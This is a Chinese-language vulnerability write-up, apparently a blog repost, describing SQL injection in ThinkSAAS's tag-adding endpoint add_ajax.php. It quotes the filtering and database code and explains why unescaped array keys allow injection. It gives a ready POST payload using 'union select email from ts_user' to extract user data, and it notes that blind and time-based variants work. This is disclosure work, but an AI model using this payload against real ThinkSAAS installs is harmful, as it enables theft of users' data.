添加标签过滤不严。 今天下了一个thinksaas 最新版, 就看了看 在xfkxfk 爆了一些洞后 还是变安全了一些。 但是还是有很多依旧没过滤。 xfkxfk 爆了app/tag/action/add.php 我看的 漏洞文件 app/tag/action/add_ajax.php
case "do":
$objname = t($_POST['objname']);
$idname = t($_POST['idname']);
$objid = t($_POST['objid']);
$tags = t($_POST['tags']);
$new['tag']->addTag($objname,$idname,$objid,$tags);
echo "<script language=JavaScript>parent.window.location.reload();</script>";
break;
}
做了过滤
function t($text) {
$text = preg_replace ( '/\[.*?\]/is', '', $text );
$text = cleanJs ( $text );
// 彻底过滤空格BY QINIAO
$text = preg_replace ( '/\s(?=\s)/', '', $text );
$text = preg_replace ( '/[\n\r\t]/', ' ', $text );
$text = str_replace ( ' ', ' ', $text );
// $text = str_replace ( ' ', '', $text );
$text = str_replace ( ' ', '', $text );
$text = str_replace ( '&', '', $text );
$text = str_replace ( '=', '', $text );
$text = str_replace ( '-', '', $text );
$text = str_replace ( '#', '', $text );
$text = str_replace ( '%', '', $text );
$text = str_replace ( '!', '', $text );
$text = str_replace ( '@', '', $text );
$text = str_replace ( '^', '', $text );
$text = str_replace ( '*', '', $text );
$text = str_replace ( 'amp;', '', $text );
$text = str_replace ( 'position', '', $text );
$text = strip_tags ( $text );
$text = htmlspecialchars ( $text );
$text = str_replace ( "'", "", $text );
return $text;
}</code>
过滤了单引号 还有各种注释。。
过滤了之后 带入了addTag
function addTag($objname,$idname,$objid,$tags){
if($objname != '' && $idname != '' && $objid!='' && $tags!=''){
$tags = str_replace ( ',', ',', $tags );
$arrTag = explode(',',$tags);
foreach($arrTag as $item){
$tagname = t($item);
if(strlen($tagname) < '32' && $tagname != ''){
$uptime = time();
$tagcount = $this->findCount('tag',array(
'tagname'=>$tagname,
));
if($tagcount == '0'){
$tagid = $this->create('tag',array(
'tagname'=>$tagname,
'uptime'=>$uptime,
));
$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
$idname=>$objid,
'tagid'=>$tagid,
));
if($tagIndexCount == '0'){
$this->create("tag_".$objname."_index",array(
$idname=>$objid,
'tagid'=>$tagid,
));
}
$tagIdCount = $this->findCount("tag_".$objname."_index",array(
'tagid'=>$tagid,
));
$count_obj = "count_".$objname;
$this->update('tag',array(
'tagid'=>$tagid,
),array(
$count_obj=>$tagIdCount,
));
}else{
$tagData = $this->find('tag',array(
'tagname'=>$tagname,
));
$tagIndexCount = $this->findCount("tag_".$objname."_index",array(
$idname=>$objid,
'tagid'=>$tagData['tagid'],
));
if($tagIndexCount == '0'){
$this->create("tag_".$objname."_index",array(
$idname=>$objid,
'tagid'=>$tagData['tagid'],
));
}
$tagIdCount = $this->findCount("tag_".$objname."_index",array(
'tagid'=>$tagData['tagid'],
));
$count_obj = "count_".$objname;
$this->update('tag',array(
'tagid'=>$tagData['tagid'],
),array(
$count_obj=>$tagIdCount,
'uptime'=>$uptime,
));
}
}
}
}
}
$tagIndexCount = $this->findCount('tag_'.$objname.'_index',array(
$idname=>$objid,
'tagid'=>$tagid,
));
可以看到 直接$idname 做key了。
public function findCount($table, $conditions = null) {
$where = "";
if (is_array ( $conditions )) {
$join = array ();
foreach ( $conditions as $key => $condition ) {
$condition = $this->escape ( $condition );
$join [] = "{$key} = {$condition}";
}
$where = "WHERE " . join ( " AND ", $join );
} else {
if (null != $conditions)
$where = "WHERE " . $conditions;
}
$sql = "SELECT COUNT(*) AS ts_counter FROM " . dbprefix . "{$table} {$where}";
$result = $this->db->once_fetch_assoc ( $sql );
return $result ['ts_counter'];
}
但是key是未过滤的。过滤了value 所以这里function t 过滤了单引号也没什么了 因为可以在key那里注入。 但是过滤了注释 后面这样就行了 objid=123&objname=article&idname=123 union select email from ts_user limit 1,1;a&tags=idname 即可注入。 可以盲注 、延时。 |
嗯 可以执行了。 修复方案: 但是 xfkxfk 爆的那个漏洞文件后 发布新版本后 你们做了过滤 但是过滤得不好, 会add_ajax 比好绕过。 为了避免和xfkxfk 爆的漏洞文件一样 所以我换了个文件。 加强过滤。 -
上一篇: PHPOK CSRF获取管理员权限及修复 - 网站安全 - 自学
下一篇: 盛大云某系统未经授权访问(可执行任意代码) -
还没有人抢沙发呢~